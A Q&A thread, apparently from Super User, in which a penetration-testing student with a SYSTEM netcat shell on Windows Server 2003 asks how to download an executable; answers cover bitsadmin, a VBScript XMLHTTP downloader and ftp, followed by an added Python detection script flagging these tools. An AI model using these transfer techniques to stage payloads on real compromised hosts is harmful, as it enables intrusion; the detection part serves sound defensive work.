
I am trying to download an executable file on Windows Server 2003 as part of a penetration testing course I am doing right now, and I seem to fail... PowerShell is not enabled and bitsadmin is just "freezing".

    C:\dlhere>bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe
    bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe

    BITSADMIN version 2.0 [ 6.6.3790.1830 ]
    BITS administration utility.
    (C) Copyright 2000-2004 Microsoft Corp.

I am clueless right now...

I just acquired command-line access with "nt authority\systemd".

fixer1234
ovxrfl0w

1 Answer


According to BITSAdmin Tool - MSDN (/Transfer switch section):

BITSAdmin updates the command window with progress information until the transfer is complete or until a critical error occurs. BITSAdmin completes the job if it successfully transfers all the files and cancels the job if a critical error occurs. BITSAdmin does not create the job if it is unable to add files to the job or if you specify an invalid value for type or job_priority. Note that BITSAdmin continues to run if a transient error occurs. To end BITSAdmin, press Ctrl+C.

Since BITS is designed to transfer in background mode, this can take an unspecified amount of time if the network is busy - and especially if the BITS service is not running (I didn't check if the command starts it).

  • Apart from that, you can download with .NET functionality as per How to download files from command line in Windows, like Wget is doing? even with PowerShell disabled because csc.exe, the C# compiler, is bundled with .NET.

  • This can also be done with cscript using the XMLHTTP COM object as per Using Windows Script Host and COM to Hack Windows (the script file can be written with copy con):

    dim XmlHttp, URL, FileName, OutputStream
    URL = "<URL>"            ' placeholder: address to fetch
    FileName = "<FILENAME>"  ' placeholder: local path to save to
    set XmlHttp = WScript.CreateObject("MSXML2.XMLHTTP")
    set OutputStream = WScript.CreateObject("ADODB.Stream")
    XmlHttp.Open "GET", URL, false
    XmlHttp.Send
    OutputStream.Type = 1 'BINARY_STREAM_TYPE
    OutputStream.Open
    OutputStream.Write XmlHttp.responseBody
    OutputStream.SaveToFile FileName, 2 'CREATE_OVERWRITE_SAVE_MODE
    OutputStream.Close
    
  • Other network utilities capable of file transfer - e.g. telnet and ftp - can do it, too. Yet these tend not to be included by default since Vista.

ivan_pozdeev
  • There is a working FTP, but I cannot seem to do anything ... I have a netcat shell. – ovxrfl0w Oct 23 '16 at 22:42
  • Well, you need to know FTP console commands, and firewalls (all the way to your external server) should allow FTP traffic. Passive mode (which is _not_ the default for the console program) is likely to be required, too. – ivan_pozdeev Oct 23 '16 at 22:50
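
For defenders reviewing hosts where these built-in tools are available, the following added example (not part of the original question, answer or comments) flags the transfer methods the answer lists when they appear in process-creation command lines. The sample records, rule names and regexes are constructed assumptions, not a vendor rule set.

```python
import re

# Rule names follow the transfer methods listed in the answer; the regexes
# are illustrative assumptions, not a vendor rule set.
RULES = [
    ("bitsadmin-transfer",
     re.compile(r"\bbitsadmin(?:\.exe)?\s.*?/(?:transfer|addfile)\b.*https?://", re.I)),
    ("csc-compile", re.compile(r"\bcsc(?:\.exe)?\s.*\.cs\b", re.I)),
    ("cscript-script",
     re.compile(r"\b[cw]script(?:\.exe)?\s.*\.(?:vbs|vbe|js|jse|wsf)\b", re.I)),
    ("ftp-scripted", re.compile(r"\bftp(?:\.exe)?\s+-s:", re.I)),
]
SHELLS = {"cmd.exe"}

# Constructed sample records: (user, parent image, command line).
SAMPLE_EVENTS = [
    (r"NT AUTHORITY\SYSTEM", "cmd.exe",
     r"bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe"),
    (r"NT AUTHORITY\SYSTEM", "cmd.exe", r"cscript //nologo C:\dlhere\get.vbs"),
    (r"CORP\builder", "msbuild.exe",
     r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:app.exe app.cs"),
    (r"NT AUTHORITY\SYSTEM", "cmd.exe", r"ftp -s:C:\dlhere\cmds.txt"),
    (r"CORP\alice", "explorer.exe", r"notepad.exe C:\docs\notes.txt"),
]


def classify(cmdline):
    """Return the name of the first rule the command line matches, else None."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None


def triage(events):
    """Return (rule, priority, cmdline) for every event that matches a rule."""
    hits = []
    for user, parent, cmdline in events:
        rule = classify(cmdline)
        if rule is None:
            continue
        # A SYSTEM-owned command shell starting a transfer tool is rare in
        # normal operation, so it is ranked above build or admin activity.
        is_system_shell = user.upper() == r"NT AUTHORITY\SYSTEM" and parent.lower() in SHELLS
        hits.append((rule, "high" if is_system_shell else "review", cmdline))
    return hits


if __name__ == "__main__":
    for rule, priority, cmdline in triage(SAMPLE_EVENTS):
        print(f"{priority:6} {rule:18} {cmdline}")
```

The csc.exe record is kept at "review" rather than dropped because build servers run the compiler legitimately; the parent process and account are what separate the two cases.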